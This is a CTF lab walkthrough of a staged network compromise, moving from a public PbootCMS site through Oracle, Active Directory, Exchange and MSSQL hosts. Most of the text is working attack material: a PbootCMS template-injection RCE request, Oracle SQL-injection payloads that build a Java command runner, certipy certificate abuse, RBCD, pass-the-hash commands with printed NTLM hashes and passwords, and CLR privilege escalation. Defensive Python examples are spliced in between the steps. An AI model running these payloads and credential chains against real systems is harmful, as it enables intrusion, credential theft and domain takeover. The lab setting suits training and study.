春秋云镜-无间计划


Two IPs are given:

39.99.149.38

39.99.136.220

One is the database:

39.99.149.38:80 open
39.99.149.38:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.149.38 code:200 len:481 title:Search UserInfo

The other is PbootCMS:

39.99.136.220:80 open
39.99.136.220:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.136.220 code:200 len:19781 title:PbootCMS-永久开源免费的PHP企业网站开发建设管理系统
[+] PocScan http://39.99.136.220/www.zip poc-yaml-backup-file
[+] PocScan http://39.99.136.220 poc-yaml-pbootcms-database-file-download
[+] PocScan http://39.99.136.220 poc-yaml-phpstudy-nginx-wrong-resolve php

Network layer 1 (first NIC)

flag1 (PbootCMS)

It turns out to be PbootCMS 1.3.5, so grab an n-day and hit it.


GET /?film=}{pboot{user:password}:if(("sy\x73\x74em")("whoami"));//)}xxx{/pboot{user:password}:if} HTTP/1.1
Host: 39.99.136.220
Accept-Encoding: gzip, deflate
Cache-Control: max-age=0
Cookie: lg=cn; PbootSystem=33r8roeqc5rr0ccqdpubd5pbgi
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


Then a vshell beacon came straight back.
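As an added defensive example (not from the original post): a small Python normalizer showing why the escaped `sy\x73\x74em` in the request above slips past a rule that looks for the literal function name, and what a WAF or log-search rule has to decode before matching. The sample query strings are constructed here; only the first one comes from the request above.

```python
import re
from urllib.parse import unquote

# Constructed sample: the query string from the request above, plus a benign one.
SAMPLE_QUERIES = [
    '/?film=}{pboot{user:password}:if(("sy\\x73\\x74em")("whoami"));//)}xxx{/pboot{user:password}:if}',
    '/?film=action&page=2',
]

# PHP functions a template-injection rule would normally look for.
DANGEROUS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval", "assert")

# An opening {pboot...:if( tag; the tag name may be padded (here with {user:password}).
PBOOT_IF = re.compile(r'\{pboot[^(]*:if\(', re.I)

def decode_php_escapes(s):
    """Resolve the escapes PHP accepts in double-quoted strings (\\xNN, \\u{...}, \\NNN octal).
    A rule that matches the literal word misses "sy\\x73\\x74em" until this is done."""
    s = re.sub(r'\\x([0-9A-Fa-f]{1,2})', lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r'\\u\{([0-9A-Fa-f]+)\}', lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r'\\([0-7]{1,3})', lambda m: chr(int(m.group(1), 8)), s)
    return s

def normalize(query):
    """Canonical form to match against: percent-decode, resolve escapes, drop quotes and whitespace."""
    q = unquote(query)
    q = decode_php_escapes(q)
    q = re.sub(r'[\s"\'`]+', '', q)
    return q.lower()

def classify(query):
    """What a naive rule sees versus what a normalizing rule sees for one query string."""
    raw = query.lower()
    norm = normalize(query)
    return {
        "pboot_if_tag": bool(PBOOT_IF.search(norm)),
        "naive_match": any(f in raw for f in DANGEROUS),
        "normalized_match": any(f in norm for f in DANGEROUS),
    }

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(classify(q), q)
```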


flag{Php_Waf_so_insteresting!}

flag2 (Oracle database)

Oracle database

1. Create the Java source
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual)>1 --

2. Privilege escalation
admin' AND (SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual)>1--

3. Create the function
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual)>1--

4. Query the created function
admin' union select null,(select object_name from all_objects where object_name ='LINXRUNCMD' and rownum=1),null from dual--

5. Query the Java source
admin' union select null,(select object_name from all_objects where object_name ='LinxUtil'),null from dual--

6. Command execution
admin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--

The function was created successfully.

It runs as SYSTEM; read the flag directly, or RDP in (I never got that to work).

flag{Do_you_kown_oracle_rce?} (One thing to note: this Oracle instance lives on a separate host from the web site, so this shell is actually a shell on the Oracle machine, not on the internet-facing server.)

flag3 (172.23.4.12/172.24.7.16)

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost IP -rport PORT

Internal network discovery

(icmp) Target 172.23.4.19     is alive
(icmp) Target 172.23.4.32 is alive
(icmp) Target 172.23.4.12 is alive
(icmp) Target 172.23.4.51 is alive
[*] Icmp alive hosts len is: 4
172.23.4.51:1521 open
172.23.4.51:445 open
172.23.4.12:445 open
172.23.4.51:139 open
172.23.4.12:139 open
172.23.4.51:135 open
172.23.4.12:135 open
172.23.4.19:80 open
172.23.4.32:80 open
172.23.4.32:22 open
172.23.4.19:22 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo
[*]172.23.4.51
[->]iZo5dw1a7des02Z
[->]172.23.4.51
[*] WebTitle http://172.23.4.19 code:200 len:481 title:Search UserInfo
[*] NetInfo
[*]172.23.4.12
[->]IZMN9U6ZO3VTRNZ
[->]172.23.4.12
[->]172.24.7.16
[*] NetBios 172.23.4.12 PENTEST\IZMN9U6ZO3VTRNZ
[*] WebTitle http://172.23.4.32 code:200 len:19779 title:PbootCMS-永久开源免费的PHP企业网站开发建设管理系统
[*] NetBios 172.23.4.51 WORKGROUP\IZO5DW1A7DES02Z
[+] PocScan http://172.23.4.32/www.zip poc-yaml-backup-file
[+] PocScan http://172.23.4.32 poc-yaml-pbootcms-database-file-download
[+] PocScan http://172.23.4.32 poc-yaml-phpstudy-nginx-wrong-resolve php

Let's summarize first:

172.23.4.19 Oracle site
172.23.4.32 PbootCMS (compromised)
172.23.4.12 PENTEST\IZMN9U6ZO3VTRNZ
172.23.4.51 Oracle database (compromised)

The CMS host needs no privilege escalation; on the Oracle host, write an account in and you get a username and password:

username: usera@pentest.me
password: Admin3gv83

Do a password spray:

proxychains -q crackmapexec smb 172.23.4.0/24 -u usera -p Admin3gv83 -d pentest.me 2>/dev/null

It can log in to 172.23.4.12; log in with this account: PENTEST\usera:Admin3gv83. flag.txt is on the desktop.


flag{not_write_password_in_txt}

flag4 (Oracle site)

There is a .ssh directory under usera's home containing a private key; known_hosts suggests this key can probably log in to 172.23.4.19, and this host also has a second network segment.



Just connect directly:

vim yunjingkey
chmod 600 yunjingkey
proxychains -q ssh -i yunjingkey 172.23.4.19


flag{id_rsa_so_useful!}

Network layer 2 (second NIC)

flag5 (DC, 172.24.7.3)

All four hosts on the first NIC are done; back to 172.23.4.12, which is a dual-homed machine.

First scan the second NIC:

172.24.7.16:445 open
172.24.7.3:135 open
172.24.7.48:445 open
172.24.7.43:445 open
172.24.7.5:445 open
172.24.7.3:445 open
172.24.7.16:135 open
172.24.7.43:139 open
172.24.7.48:139 open
172.24.7.3:139 open
172.24.7.5:139 open
172.24.7.16:139 open
172.24.7.48:135 open
172.24.7.43:135 open
172.24.7.5:135 open
172.24.7.23:80 open
172.24.7.3:80 open
172.24.7.27:22 open
172.24.7.23:22 open
172.24.7.5:88 open
172.24.7.3:88 open
172.24.7.27:8091 open
172.24.7.23:8060 open
172.24.7.27:8090 open
172.24.7.23:9094 open
[*] NetBios 172.24.7.48 PENTEST\IZAYSXE6VCUHB4Z
[*] NetInfo
[*]172.24.7.3
[->]DC
[->]172.25.12.9
[->]172.24.7.3
[*] NetBios 172.24.7.43 PENTEST\IZMN9U6ZO3VTRPZ
[*] NetInfo
[*]172.24.7.48
[->]IZAYSXE6VCUHB4Z
[->]172.24.7.48
[*] NetInfo
[*]172.24.7.43
[->]IZMN9U6ZO3VTRPZ
[->]172.24.7.43
[->]172.26.8.12
[*] NetInfo
[*]172.24.7.5
[->]DCadmin
[->]172.25.12.7
[->]172.24.7.5
[*] WebTitle http://172.24.7.23:8060 code:404 len:555 title:404 Not Found
[*] NetBios 172.24.7.3 [+] DC:DC.pentest.me Windows Server 2016 Standard 14393
[*] NetBios 172.24.7.5 [+] DC:DCadmin.pen.me Windows Server 2016 Standard 14393
[*] OsInfo 172.24.7.5 (Windows Server 2016 Standard 14393)
[*] OsInfo 172.24.7.3 (Windows Server 2016 Standard 14393)
[*] NetInfo
[*]172.24.7.16
[->]IZMN9U6ZO3VTRNZ
[->]172.23.4.12
[->]172.24.7.16
[*] WebTitle http://172.24.7.23 code:302 len:98 title:None 跳转url: http://172.24.7.23/users/sign_in
[*] WebTitle http://172.24.7.27:8091 code:204 len:0 title:None
[*] WebTitle http://172.24.7.27:8090 code:302 len:0 title:None 跳转url: http://172.24.7.27:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
[*] WebTitle http://172.24.7.3 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.24.7.23/users/sign_in code:200 len:30152 title:Sign in · GitLab
[+] PocScan http://172.24.7.3 poc-yaml-active-directory-certsrv-detect
[+] InfoScan http://172.24.7.27:8090/login.action?os_destination=%2Findex.action&permissionViolation=true [ATLASSIAN-Confluence]

Summary:

172.24.7.16 IZMN9U6ZO3VTRNZ.pentest.me (compromised)
172.24.7.3 DC.pentest.me
172.24.7.5 DCadmin.pen.me (another domain controller)
172.24.7.23
172.24.7.27
172.24.7.43 IZMN9U6ZO3VTRPZ.pentest.me
172.24.7.48 IZAYSXE6VCUHB4Z.pentest.me

poc-yaml-active-directory-certsrv-detect shows up again; after some trying, CVE-2022-26923 worked.

First set up the second-layer proxy:
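The two summaries above (after the first and the second scan) were built by hand from fscan output. As an added example, not part of the original write-up, here is a Python parser that produces that inventory automatically: it groups ports, NetBIOS names, web titles and POC hits per host and flags dual-homed machines (the extra addresses listed under NetInfo, which is how 172.23.4.12 leads to the 172.24.7.0/24 segment). The sample lines are a constructed excerpt of the first internal scan.

```python
import re
from collections import defaultdict

# Constructed excerpt of the first internal fscan run in the write-up (same line formats).
FSCAN_SAMPLE = """\
(icmp) Target 172.23.4.12 is alive
172.23.4.51:1521 open
172.23.4.51:445 open
172.23.4.12:445 open
172.23.4.19:80 open
172.23.4.32:80 open
[*] NetInfo
[*]172.23.4.51
[->]iZo5dw1a7des02Z
[->]172.23.4.51
[*] WebTitle http://172.23.4.19 code:200 len:481 title:Search UserInfo
[*] NetInfo
[*]172.23.4.12
[->]IZMN9U6ZO3VTRNZ
[->]172.23.4.12
[->]172.24.7.16
[*] NetBios 172.23.4.12 PENTEST\\IZMN9U6ZO3VTRNZ
[*] NetBios 172.23.4.51 WORKGROUP\\IZO5DW1A7DES02Z
[+] PocScan http://172.23.4.32 poc-yaml-pbootcms-database-file-download
"""

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
PORT_RE = re.compile(rf"^({IP}):(\d+) open$")
NETINFO_IP_RE = re.compile(rf"^\[\*\]({IP})$")          # first line of a NetInfo block
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios ({IP}) (?:\[\+\] DC:)?(\S+)")
WEB_RE = re.compile(rf"^\[\*\] WebTitle (https?://({IP})\S*) .*?title:(.*)$")
POC_RE = re.compile(rf"^\[\+\] PocScan (https?://({IP})\S*) (\S+)")

def new_host():
    return {"ports": set(), "names": set(), "domain": None, "ips": set(), "web": {}, "pocs": set()}

def parse_fscan(text):
    """Group fscan lines per host; NetInfo [->] lines list every address a host has."""
    hosts = defaultdict(new_host)
    current = None  # host whose NetInfo block is being read
    for line in text.splitlines():
        line = line.strip()
        if (m := PORT_RE.match(line)):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif (m := NETINFO_IP_RE.match(line)):
            current = m[1]
            hosts[current]["ips"].add(current)
            continue
        elif current and line.startswith("[->]"):
            value = line[4:]
            if re.fullmatch(IP, value):
                hosts[current]["ips"].add(value)      # a second address = another segment
            else:
                hosts[current]["names"].add(value.upper())
            continue
        elif (m := NETBIOS_RE.match(line)):
            name = m[2]
            if "\\" in name:
                hosts[m[1]]["domain"], name = name.split("\\", 1)
            hosts[m[1]]["names"].add(name.upper())
        elif (m := WEB_RE.match(line)):
            hosts[m[2]]["web"][m[1]] = m[3].strip()
        elif (m := POC_RE.match(line)):
            hosts[m[2]]["pocs"].add(m[3])
        current = None  # any other line ends the NetInfo block
    return dict(hosts)

def summarize(hosts):
    """One row per host, sorted by address, with the pivot-relevant facts made explicit."""
    rows = []
    for ip in sorted(hosts, key=lambda s: tuple(int(o) for o in s.split("."))):
        h = hosts[ip]
        name = ",".join(sorted(h["names"])) or "?"
        if h["domain"]:
            name = h["domain"] + "\\" + name
        rows.append({"ip": ip, "name": name, "ports": sorted(h["ports"]),
                     "dual_homed": sorted(h["ips"] - {ip}),
                     "web": h["web"], "pocs": sorted(h["pocs"])})
    return rows
```

Calling `summarize(parse_fscan(FSCAN_SAMPLE))` yields one row per host; a non-empty `dual_homed` list marks the machines worth watching as pivots.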

listen 9999

agent -rhost 172.23.4.32 -rport 9999

Create a machine account:

proxychains4 -q certipy-ad account create -u usera@pentest.me -p Admin3gv83 -dc-ip 172.24.7.3 -user citrus -pass '123@#ABC' -dns 'DC.pentest.me'

Request a machine certificate (if it times out, just run it again):

proxychains -q certipy-ad req -u 'citrus$@pentest.me' -p '123@#ABC' -ca 'pentest-DC-CA'  -dc-ip 172.24.7.3 -template 'Machine' -debug 

As usual, dump the domain admin hash:

proxychains -q certipy-ad auth -pfx dc.pfx -dc-ip 172.24.7.3

Surprisingly it worked this time; I thought it would fail again.

Then use this hash to dump the administrator's hash (if this step fails, add the DC to your hosts file):

proxychains -q impacket-secretsdump 'dc$@pentest.me@DC.pentest.me' -hashes :d39b575a612813527824b31d819d52a3
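A defender's view of the steps above, as an added example that is not part of the write-up: the chain works because a freshly created machine account (citrus$) is given a dNSHostName equal to the DC's. The Python check below runs over constructed computer-object records (the account and host names come from the write-up; the creator and primaryGroupID fields are invented) and flags non-DC machine accounts whose dNSHostName collides with a domain controller or does not match their own sAMAccountName, which is what an LDAP audit or an Event ID 4741/5136 enrichment should alert on.

```python
# Constructed sample of computer objects, as an LDAP export or Event ID 4741 enrichment
# would show them right after the account-creation step above. DC$ and citrus$ are the
# names from the write-up; created_by and primaryGroupID are invented for illustration.
DOMAIN = "pentest.me"
DOMAIN_CONTROLLERS = {"DC.pentest.me"}
DC_GROUP_RID = 516  # primaryGroupID of members of "Domain Controllers"

COMPUTERS = [
    {"sAMAccountName": "DC$", "dNSHostName": "DC.pentest.me",
     "created_by": "SYSTEM", "primaryGroupID": 516},
    {"sAMAccountName": "IZMN9U6ZO3VTRNZ$", "dNSHostName": "IZMN9U6ZO3VTRNZ.pentest.me",
     "created_by": "SYSTEM", "primaryGroupID": 515},
    {"sAMAccountName": "citrus$", "dNSHostName": "DC.pentest.me",
     "created_by": "usera", "primaryGroupID": 515},
]

def expected_dns_name(sam_account_name, domain=DOMAIN):
    """The dNSHostName a machine account normally carries: <name-without-$>.<domain>."""
    return f"{sam_account_name.rstrip('$')}.{domain}".lower()

def find_spoofed_hosts(computers, dcs=DOMAIN_CONTROLLERS, domain=DOMAIN):
    """Flag non-DC machine accounts whose dNSHostName points at a DC or mismatches their name."""
    dc_names = {d.lower() for d in dcs}
    findings = []
    for c in computers:
        if c.get("primaryGroupID") == DC_GROUP_RID:
            continue  # real domain controllers legitimately own these names
        dns = (c.get("dNSHostName") or "").lower()
        reasons = []
        if dns in dc_names:
            reasons.append("dNSHostName collides with a domain controller")
        if dns and dns != expected_dns_name(c["sAMAccountName"], domain):
            reasons.append("dNSHostName does not match sAMAccountName")
        if reasons:
            findings.append({"account": c["sAMAccountName"], "dNSHostName": dns,
                             "created_by": c.get("created_by"), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in find_spoofed_hosts(COMPUTERS):
        print(finding)
```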

Alternatively, use the certificate to configure RBCD on the DC, then get a silver ticket and do PTT.

Configure RBCD on the DC with the certificate via passthecert.py:

certipy-ad cert -pfx dc.pfx -nokey -out dc.crt 
certipy-ad cert -pfx dc.pfx -nocert -out dc.key

Configure RBCD:

proxychains -q python3 passthecert.py -action write_rbcd -crt dc.crt -key dc.key -domain DC.pentest.me -dc-ip 172.24.7.3 -delegate-to 'dc$' -delegate-from 'citrus$'

Request a service ticket (ST) for the cifs service:

proxychains -q impacket-getST pentest.me/'citrus$':'123@#ABC' -spn cifs/DC.pentest.me -impersonate Administrator -dc-ip 172.24.7.3

Export the environment variable:

export KRB5CCNAME=Administrator@cifs_DC.pentest.me@PENTEST.ME.ccache

PTT

proxychains -q python psexec.py pentest.me/administrator@DC.pentest.me -k -no-pass -target-ip 172.24.7.3 -codec gbk


flag{congratulations_get_DC!}

flag6 (172.24.7.43/172.26.8.12)

Straight PTH:

proxychains -q impacket-smbexec  -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.43 -codec gbk


flag{Rdp_sooooooo_cool}

Here is also a way to dump hashes via PTT:

proxychains python3 secretsdump.py -k -no-pass Administrator@dc.pentest.me -dc-ip 172.24.7.3

flag7 (172.24.7.48)

PTH:

proxychains -q impacket-smbexec  -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.48 -codec gbk


flag{relay_is_so_dangerous}

flag8 (DCadmin, 172.24.7.5/172.25.12.7)

proxychains -q impacket-smbexec  -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.5 -codec gbk

That can't be right; isn't this another domain controller? PTH works on it too; I don't get it.

flag{Sid_history_is_sooooo_helpful}

Network layer 3 (third NIC)

flag9 (172.25.12.29)

The second NIC is all done now; DCadmin has yet another NIC, so keep scanning the internal network and set up a proxy.

Run secretsdump again with the administrator hash (this step is extremely slow):

proxychains -q python3.13 secretsdump.py pentest.me/administrator@172.24.7.5 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -dc-ip 172.24.7.5

Note these two hashes:

pen.me\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f91138ef5392b87416ed41cb6e810b7:::
pen.me\exchange:1148:aad3b435b51404eeaad3b435b51404ee:21a43bd74a20a330ef77a4e7bd179d8c:::

Then use PTH to add an administrator user first:

proxychains -q impacket-smbexec  -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.5 -codec gbk

Then:

net user fffffilm Password@973 /add
net localgroup administrators fffffilm /add

RDP in and scan the internal network:

172.25.12.7:445 open
172.25.12.7:139 open
172.25.12.7:135 open
172.25.12.7:88 open
[*] OsInfo 172.25.12.7 (Windows Server 2016 Standard 14393)
[*] NetInfo
[*]172.25.12.7
[->]DCadmin
[->]172.25.12.7
[->]172.24.7.5
172.25.12.19:808 open
172.25.12.9:88 open
172.25.12.7:88 open
172.25.12.9:445 open
172.25.12.19:445 open
172.25.12.29:445 open
172.25.12.7:445 open
172.25.12.19:443 open
172.25.12.9:139 open
172.25.12.19:139 open
172.25.12.29:139 open
172.25.12.9:135 open
172.25.12.7:139 open
172.25.12.19:135 open
172.25.12.29:135 open
172.25.12.7:135 open
172.25.12.19:81 open
172.25.12.9:80 open
172.25.12.19:80 open
172.25.12.19:8172 open
[*] OsInfo 172.25.12.7 (Windows Server 2016 Standard 14393)
[*] NetInfo
[*]172.25.12.19
[->]IZ1TUCEKFDPCEMZ
[->]172.25.12.19
[*] NetInfo
[*]172.25.12.29
[->]IZ88QYK8Y8Y3VXZ
[->]172.25.12.29
[*] NetInfo
[*]172.25.12.9
[->]DC
[->]172.25.12.9
[->]172.24.7.3
[*] NetBios 172.25.12.29 PEN\IZ88QYK8Y8Y3VXZ
[*] NetInfo
[*]172.25.12.7
[->]DCadmin
[->]172.25.12.7
[->]172.24.7.5
[*] NetBios 172.25.12.9 [+] DC:DC.pentest.me Windows Server 2016 Standard 14393
[*] NetBios 172.25.12.19 IZ1TUCEKFDPCEMZ.pen.me Windows Server 2016 Datacenter 14393
[*] OsInfo 172.25.12.9 (Windows Server 2016 Standard 14393)
[*] WebTitle http://172.25.12.19:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle http://172.25.12.9 code:200 len:703 title:IIS Windows Server
[+] PocScan http://172.25.12.9 poc-yaml-active-directory-certsrv-detect
[*] WebTitle https://172.25.12.19:8172 code:404 len:0 title:None
[*] WebTitle http://172.25.12.19 code:403 len:0 title:None
[*] WebTitle https://172.25.12.19 code:302 len:0 title:None 跳转url: https://172.25.12.19/owa/
[*] WebTitle https://172.25.12.19/owa/auth/logon.aspx?url=https%3a%2f%2f172.25.12.19%2fowa%2f&reason=0 code:200 len:28242 title:Outlook

Set up the proxy:

listen 9999
agent -rhost 172.24.7.16 -rport 9999

With the hash in hand, continue with PTH:

proxychains python wmiexec.py pen.me/administrator@172.25.12.29 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk

proxychains impacket-smbexec -hashes :0f91138ef5392b87416ed41cb6e810b7 pen.me/administrator@172.25.12.29 -codec gbk


flag{Group_Policy!s}

flag10 (172.25.12.19)

Continue with PTH. The .19 box kept failing to start, I don't know why (it came up the first time, but I hadn't gotten to the PTH step yet; later I started it several more times and it never came up, and I couldn't bear to spend more 沙砾 on it, so I stopped. Anyway it is just a PTH to read the flag, then RDP in and grab the mail for the next flag).

proxychains impacket-smbexec -hashes :0f91138ef5392b87416ed41cb6e810b7 pen.me/administrator@172.25.12.19 -codec gbk

flag{Dc_Administrator_can_do_anything!}

flag11 (172.25.12.19)

Just read the mail; use the exchange user to read the mailbox:

proxychains -q python pthexchange.py --target http://172.25.12.19/ --username exchange --password '00000000000000000000000000000000:21a43bd74a20a330ef77a4e7bd179d8c' --action Download

flag{Exchange_have_so_many_things}

flag12 (172.26.8.16)

There is a Confluence on 172.24.7.23; this login succeeded: usera:Admin3gv83

You can get an Excel spreadsheet from it.

There is a GitLab on 172.24.7.23, and the account is reused:

echo 'grant_type=password&username=usera&password=Admin3gv83' > auth.txt
proxychains -q curl --data "@auth.txt" --request POST http://172.24.7.23/oauth/token

This returns:

{"access_token":"a40510f126e0e767a4fe1062e1d5fbae84d8a0c335da8f2fe3f8b3f1af86cf23","token_type":"Bearer","expires_in":7200,"refresh_token":"8ad4a95ff4e5704a9eb567ee4a7255fea3c1000af30501b3eed676f1394539fd","scope":"api","created_at":1748079786}

Then run:

proxychains -q curl --header "Authorization: Bearer a40510f126e0e767a4fe1062e1d5fbae84d8a0c335da8f2fe3f8b3f1af86cf23" http://172.24.7.23/api/v4/users | jq

This shows there are only three valid users: luzizhuo, usera and root. Logging into GitLab as luzizhuo, there is a private project called Financial system-demo, and its commit history contains:

IP: 172.26.8.16
username: sa
password: sqlserver_2022

Upload the files with smbclient:

proxychains python3 smbclient.py -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.43

# shares
ADMIN$
C$
IPC$
# use C$
# pwd
/
# put fscan.exe
# put agent.exe
# ls
......
-rw-rw-rw- 3299328 Sat May 24 17:37:58 2025 agent.exe
-rw-rw-rw- 6427136 Sat May 24 17:36:03 2025 fscan.exe

Then PTH with the hash obtained earlier and run the commands:

proxychains -q impacket-smbexec  -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.43 -codec gbk

The scan gives:

(icmp) Target 172.26.8.12     is alive
(icmp) Target 172.26.8.16 is alive
[*] Icmp alive hosts len is: 2
172.26.8.16:445 open
172.26.8.12:445 open
172.26.8.16:139 open
172.26.8.16:135 open
172.26.8.16:1433 open
172.26.8.12:139 open
172.26.8.12:135 open
[*] alive ports len is: 7
start vulscan
[*] NetInfo
[*]172.26.8.12
[->]IZMN9U6ZO3VTRPZ
[->]172.24.7.43
[->]172.26.8.12
[*] NetInfo
[*]172.26.8.16
[->]iZq7i1huitnk6hZ
[->]172.26.8.16
[*] NetBios 172.26.8.16 WORKGROUP\iZq7i1huitnk6hZ Windows Server 2016 Datacenter 14393

The target is 172.26.8.16, and port 1433 is open.

Set up the proxy; the final proxy chain looks like this:

listen 9999
agent -rhost 172.24.7.16 -rport 9999

Ridter/PySQLTools, an MSSQL exploitation tool, escalated privileges and took the box in one go.

proxychains -q python PySQLTools.py sa:'sqlserver_2022'@172.26.8.16 -debug

enable_ole
enable_clr

install_clr
clr_badpotato whoami

clr_badpotato type C:\Users\Administrator\Desktop\flag.txt


flag{clr?no_flag}